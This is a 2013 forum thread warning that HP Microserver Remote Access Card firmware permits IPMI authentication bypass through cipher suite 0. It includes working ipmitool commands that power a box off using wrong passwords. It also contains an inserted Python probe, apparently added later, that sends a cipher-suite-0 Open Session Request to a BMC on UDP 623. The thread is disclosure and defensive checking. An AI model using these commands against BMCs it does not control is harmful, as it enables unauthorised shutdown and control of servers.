e4Bkt Posted August 16, 2013

I registered here just to share this warning. HP recently published a security advisory, document c03844348. It only mentions servers with iLO hardware, but the Microserver's Remote Access Card (615095-B21) is vulnerable too. The issue is authentication bypass: anybody can send commands to the box without knowing the password. Firmware 1.2 and 1.3 are both vulnerable.

Here's how it works. I'll query the status of the box from a remote Linux system using password 'abc':

```
$ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P abc chassis status
System Power         : on
Power Overload       : false
Power Interlock      : inactive
Main Power Fault     : false
Power Control Fault  : false
Power Restore Policy : always-off
Last Power Event     : command
Chassis Intrusion    : inactive
Front-Panel Lockout  : inactive
Drive Fault          : false
Cooling/Fan Fault    : false
```

Cool, the box is on. Should I know that? Can I change that? The correct password is not 'abc'.

```
$ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P 123 power off
Chassis Power Control: Down/Off
```

I used a different password and didn't get any errors back...

```
$ ipmitool -I lanplus -C 0 -H 192.168.1.141 -U admin -P xyz chassis status
System Power         : off
Power Overload       : false
Power Interlock      : inactive
Main Power Fault     : false
Power Control Fault  : false
Power Restore Policy : always-off
Last Power Event     : command
Chassis Intrusion    : inactive
Front-Panel Lockout  : inactive
Drive Fault          : false
Cooling/Fan Fault    : false
```

Crap. Now the box is off. 'abc', '123' and 'xyz' are not the correct password. Setting the cypher type to zero allows complete authentication bypass. Unchecking "enable IPMI over LAN" prevents the problem unless, y'know, you wanted to actually use IPMI for something...
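The check a practitioner wants after reading the post above is whether a given BMC will still agree to cipher suite 0, which is what the `-C 0` in those ipmitool commands selects. The following is an added example, not code from the original post, from HP, or from ipmitool: it builds the IPMI 2.0 (RMCP+) Open Session Request that proposes cipher suite 0 (authentication, integrity and confidentiality all "none") and interprets the BMC's Open Session Response. A BMC that answers with status 0 and all three algorithms set to "none" has agreed to a session whose RAKP exchange carries no keyed hash, so the password is never verified; that is the bypass the post demonstrates. The sample response bytes are constructed to show both outcomes and were not captured from a Remote Access Card. `probe()` sends a real datagram to UDP 623 and is meant for your own hardware only; the console session ID and the BMC session ID in the sample are arbitrary values chosen for the example.

```python
"""Build an RMCP+ Open Session Request for cipher suite 0 and interpret the
Open Session Response, to tell whether a BMC still accepts cipher suite 0.
Added example; wire layout follows the IPMI 2.0 specification."""
import socket
import struct

RMCP_PORT = 623
# Cipher suite 0: auth "none", integrity "none", confidentiality "none".
CIPHER_SUITE_0 = (0x00, 0x00, 0x00)
# Cipher suite 3: RAKP-HMAC-SHA1, HMAC-SHA1-96, AES-CBC-128 (for comparison).
CIPHER_SUITE_3 = (0x01, 0x01, 0x01)
RMCP_HEADER = bytes([0x06, 0x00, 0xFF, 0x07])  # version, reserved, seq 0xFF (no ack), class IPMI
STATUS_NAMES = {0x00: "no errors", 0x11: "no cipher suite match"}


def _algorithm_payloads(algs):
    """Three 8-byte records: type, 2 reserved, length 8, algorithm, 3 reserved."""
    out = b""
    for ptype, alg in zip((0x00, 0x01, 0x02), algs):   # 0=auth, 1=integrity, 2=confidentiality
        out += struct.pack("<BBBBB3x", ptype, 0, 0, 0x08, alg)
    return out


def build_open_session_request(console_session_id: int, algs=CIPHER_SUITE_0,
                               tag: int = 0x00, priv: int = 0x04) -> bytes:
    """RMCP header + IPMI 2.0 session header + 32-byte Open Session Request."""
    payload = struct.pack("<BBH", tag, priv, 0)         # message tag, max privilege (4 = ADMIN), reserved
    payload += struct.pack("<I", console_session_id)    # remote console session ID
    payload += _algorithm_payloads(algs)
    # session header: auth format 0x06 (RMCP+), payload type 0x10 (Open Session
    # Request), session ID 0, session sequence 0, payload length
    header = struct.pack("<BBIIH", 0x06, 0x10, 0, 0, len(payload))
    return RMCP_HEADER + header + payload


def parse_open_session_response(datagram: bytes) -> dict:
    """Pull status and negotiated algorithms out of an Open Session Response."""
    if len(datagram) < 16 or datagram[0] != 0x06 or datagram[3] != 0x07:
        raise ValueError("not an RMCP/IPMI datagram")
    auth_type, payload_type, _sid, _seq, plen = struct.unpack_from("<BBIIH", datagram, 4)
    if auth_type != 0x06 or payload_type != 0x11:        # 0x11 = Open Session Response
        raise ValueError("not an RMCP+ Open Session Response")
    payload = datagram[16:16 + plen]
    if len(payload) < 36:
        raise ValueError("truncated Open Session Response payload")
    tag, status, priv, _res, console_id, bmc_id = struct.unpack_from("<BBBBII", payload, 0)
    return {
        "tag": tag,
        "status": status,
        "status_name": STATUS_NAMES.get(status, "0x%02x" % status),
        "max_privilege": priv,
        "console_session_id": console_id,
        "bmc_session_id": bmc_id,
        # algorithm byte sits 4 bytes into each 8-byte record at offsets 12, 20, 28
        "auth_alg": payload[16],
        "integrity_alg": payload[24],
        "confidentiality_alg": payload[32],
    }


def accepts_cipher_zero(parsed: dict) -> bool:
    """True when the BMC agreed to a session with no authentication at all."""
    return parsed["status"] == 0x00 and (
        parsed["auth_alg"], parsed["integrity_alg"], parsed["confidentiality_alg"]) == CIPHER_SUITE_0


def constructed_response(status: int, algs=CIPHER_SUITE_0, console_id: int = 0xA4A3A2A0,
                         bmc_id: int = 0x00000020) -> bytes:
    """Constructed sample Open Session Response (not captured from any device)."""
    payload = struct.pack("<BBBBII", 0x00, status, 0x04, 0, console_id, bmc_id)
    payload += _algorithm_payloads(algs)
    header = struct.pack("<BBIIH", 0x06, 0x11, 0, 0, len(payload))
    return RMCP_HEADER + header + payload


def probe(host: str, timeout: float = 3.0) -> dict:
    """Send one cipher-suite-0 Open Session Request to a BMC you own and report
    what it answered. Network side effect; use against your own hardware."""
    req = build_open_session_request(0xA4A3A2A0)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(req, (host, RMCP_PORT))
        data, _ = s.recvfrom(1024)
    return parse_open_session_response(data)


if __name__ == "__main__":
    for status in (0x00, 0x11):
        parsed = parse_open_session_response(constructed_response(status))
        print("status %-22s accepts cipher 0: %s" % (parsed["status_name"], accepts_cipher_zero(parsed)))
```

Only the Open Session exchange is needed for the check: a BMC that rejects cipher suite 0 answers with a non-zero status (0x11, "no cipher suite match", is the code the spec assigns to that case) before any RAKP message is sent, so the probe never has to attempt a login. After applying a firmware update or an IPMI-over-LAN change, rerun the probe and expect `accepts_cipher_zero()` to turn false; whether the Remote Access Card firmware also honours ipmitool's `lan set <channel> cipher_privs` setting, which on other BMCs can disable cipher suite 0 by itself, is not something the post establishes.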
Mr_Smartepants Posted August 17, 2013

Scary. At least they identified it and are working on a fix.

ikon Posted August 17, 2013

Thanks e4Bkt, both for registering and for posting the warning... very decent of you.